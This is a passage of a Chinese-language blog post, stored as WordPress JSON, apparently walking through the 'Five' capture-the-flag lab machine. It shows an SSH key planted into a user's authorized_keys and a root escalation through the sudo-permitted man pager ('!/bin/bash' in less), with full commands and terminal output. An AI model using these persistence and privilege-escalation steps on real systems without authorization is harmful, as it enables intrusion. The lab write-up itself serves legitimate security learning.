-y -f melisa &gt; authorized_keys\n(remote) www-data@five:\/tmp$ sudo -u melisa cp \/tmp\/authorized_keys \/home\/melisa\/.ssh\/authorized_keys\n(remote) www-data@five:\/tmp$ ssh melisa@127.0.0.1 -p 4444 -i melisa \nCould not create directory &#039;\/var\/www\/.ssh&#039;.\nThe authenticity of host &#039;[127.0.0.1]:4444 ([127.0.0.1]:4444)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:jWQpYhXQJtOuJfrNjZvNSilLDT7fkbFxeioQzGTBY7Y.\nAre you sure you want to continue connecting (yes\/no)? 
yes\nFailed to add the host to the list of known hosts (\/var\/www\/.ssh\/known_hosts).\nLinux five 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Oct  6 03:39:32 2020 from 192.168.1.58\nmelisa@five:~$ <\/code><\/pre>\n<p>\u6210\u529f\u767b\u5f55\uff01<\/p>\n<h3>\u63d0\u6743\u81f3root<\/h3>\n<p>\u5148\u4fe1\u606f\u641c\u96c6<\/p>\n<pre><code class=\"language-bash\">melisa@five:~$ ls -la\ntotal 40\ndrwxr-xr-x 4 melisa melisa 4096 Oct  6  2020 .\ndrwxr-xr-x 3 root   root   4096 Oct  5  2020 ..\n-rw-r--r-- 1 melisa melisa  220 Oct  5  2020 .bash_logout\n-rw-r--r-- 1 melisa melisa 3526 Oct  5  2020 .bashrc\n-rw------- 1 melisa melisa   72 Oct  5  2020 .lesshst\ndrwxr-xr-x 3 melisa melisa 4096 Oct  5  2020 .local\n-rw-r--r-- 1 melisa melisa  807 Oct  5  2020 .profile\ndrwx------ 2 melisa melisa 4096 Oct  6  2020 .ssh\n-rw------- 1 melisa melisa   14 Oct  5  2020 user.txt\n-rw------- 1 melisa melisa  100 Oct  6  2020 .Xauthority\nmelisa@five:~$ cat user.txt \nIlovebinaries\nmelisa@five:~$ sudo -l\nMatching Defaults entries for melisa on five:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser melisa may run the following commands on five:\n    (ALL) SETENV: NOPASSWD: \/bin\/pwd, \/bin\/arch, \/bin\/man, \/bin\/id, \/bin\/rm, \/bin\/clear<\/code><\/pre>\n<p>\u8fd9\u4e48\u591asudo\u6587\u4ef6\uff0c\u7a33\u4e86\uff0c\u90fd\u7a33\u4e86\uff01\uff01<\/p>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/man\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/man\/#sudo<\/a><\/p>\n<p>\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821907.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821907.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421181124703\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u65e0\u6cd5\u8f93\u5165\u547d\u4ee4\u3002\u3002\u3002\u4f46\u662f\u5728kali\u4e2d\u662f\u53ef\u4ee5\u6267\u884c\u7684\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821908.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821908.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421181402648\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6839\u636e\u5927\u4f6c\u6307\u70b9\u4ee5\u540e\u77e5\u9053\u8fd9\u662f\u56e0\u4e3a\u5206\u9875\u6a21\u5f0f\u4e0d\u540c\uff0c\u4f7f\u7528less\u5206\u9875\u5c06\u9614\u4ee5\u76f4\u63a5\u6267\u884c\u547d\u4ee4\uff01<\/p>\n<pre><code class=\"language-bash\">melisa@five:~$ sudo \/bin\/man man -P \/bin\/less\n\/bin\/man: 
-P-\/bin\/less: No such file or directory\n\/bin\/man: -P_\/bin\/less: No such file or directory\nNo manual entry for -P\n--Man-- next: less(1) [ view (return) | skip (Ctrl-D) | quit (Ctrl-C) ]\n!\/bin\/bash\nmelisa@five:~$ sudo \/bin\/man -P \/usr\/bin\/less \/bin\/man\nroot@five:\/home\/melisa# cd \/root\nroot@five:~# ls -la\ntotal 32\ndrwx------  3 root root 4096 Oct  7  2020 .\ndrwxr-xr-x 18 root root 4096 Oct  5  2020 ..\n-rw-------  1 root root  101 Oct  7  2020 .bash_history\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\n-rw-------  1 root root   59 Oct  5  2020 .lesshst\ndrwxr-xr-x  3 root root 4096 Oct  5  2020 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-------  1 root root   14 Oct  5  2020 root.txt\nroot@five:~# cat root.txt \nWTFGivemefiv<\/code><\/pre>\n<p>\u5b66\u5230\u4e86\uff0c\u65b0\u59ff\u52bf\uff01\uff01\uff01\uff01lol\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Five \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.188 &#8212; -A Open 192 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-600","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/600","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=600"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/600\/revisions"}],"predecessor-version":[{"id":601,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/600\/revisions\/601"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=600"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=600"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=600"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}